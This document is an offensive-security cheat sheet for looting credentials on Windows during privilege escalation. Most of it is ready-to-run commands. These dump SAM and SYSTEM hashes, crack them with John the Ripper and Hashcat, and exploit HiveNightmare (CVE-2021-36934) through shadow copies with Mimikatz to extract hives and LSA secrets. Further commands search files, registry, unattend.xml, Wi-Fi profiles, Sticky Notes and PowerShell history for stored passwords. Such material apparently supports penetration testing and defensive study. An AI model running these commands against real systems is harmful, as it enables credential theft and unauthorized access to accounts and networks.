# EoP - Looting for passwords

### 1. Accessing Password Hashes

#### **1.1 Security Account Manager (SAM) and SYSTEM Files**

The SAM file contains hashed passwords for user accounts, typically stored as LM or NTLM hashes.

**Locations:**

* `%SystemRoot%\System32\config\SAM`
* `%SystemRoot%\repair\SAM`
* `%SystemRoot%\System32\config\RegBack\SAM`

#### **1.2 Extracting Hashes**

**Using pwdump:**

```bash
pwdump SYSTEM SAM > /root/sam.txt
```

**Using samdump2:**

```bash
samdump2 SYSTEM SAM -o sam.txt
```

#### **1.3 Cracking Hashes**

**John the Ripper:**

```bash
john --format=NT /root/sam.txt
```

**Hashcat:**

```bash
hashcat -m 1000 -a 0 sam.txt wordlist.txt
```

***

### 2. Exploiting Vulnerabilities

#### **2.1 HiveNightmare (CVE-2021-36934)**

This vulnerability allows non-administrative users to access sensitive registry hives.

**Check for Vulnerability:**

```cmd
icacls config\SAM
```

Ensure `BUILTIN\Users` does not have read access.

**Exploitation Steps:**

1. **Request shadow copies:**

   ```cmd
   vssadmin list shadows
   ```
2. **Extract hives using Mimikatz:**

   ```mimikatz
   lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
   ```

***

### 3. LAPS (Local Administrator Password Solution) Settings

#### **Extract LAPS Settings**

**Command:**

```cmd
reg query HKLM\Software\Policies\Microsoft Services\AdmPwd /s
```

**Key Values to Look For:**

* **AdmPwdEnabled**: LAPS enabled status.
* **AdminAccountName**: Name of the administrator account.
* **PasswordComplexity**: Password complexity requirements.
* **PasswordLength**: Required password length.
* **PwdExpirationProtectionEnabled**: Expiration protection status.

***

### 4. Searching for Passwords in Files and Shares

#### **4.1 Local File Search**

**Commands:**

```cmd
findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
```

#### **4.2 Searching in Remote Locations**

* **SharePoint:** Use **SnaffPoint**.
* **SMB Shares:** Use **Snaffler** for automated searches.

***

### 5. Extracting Secrets with Mimikatz

**Commands:**

```mimikatz
token::whoami /full
misc::shadowcopies
lsadump::secrets /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /security:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
```

***

### 6. Finding Credentials in Configuration Files

#### **6.1 Unattend.xml**

**Locations:**

* `C:\unattend.xml`
* `C:\Windows\Panther\Unattend.xml`

**Decode Base64 Passwords:**

```bash
echo "base64_encoded_password" | base64 -d
```

**Example Content:**

```xml
<AutoLogon>
  <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=</Password>
  <Enabled>true</Enabled>
  <Username>Administrateur</Username>
</AutoLogon>
```

***

### 7. IIS Web Config

**Command:**

```powershell
Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```

***

### 8. Additional Sources of Passwords

#### **8.1 Wireless Passwords**

**Commands:**

```cmd
netsh wlan show profiles
netsh wlan show profile <SSID> key=clear
```

***

#### **8.2 Sticky Notes**

Extract passwords from Sticky Notes SQLite database:

```cmd
C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
```

***

#### **8.3 PowerShell History**

**Command:**

```powershell
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

***

#### **8.4 Registry Searches**

**Commands:**

```cmd
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
```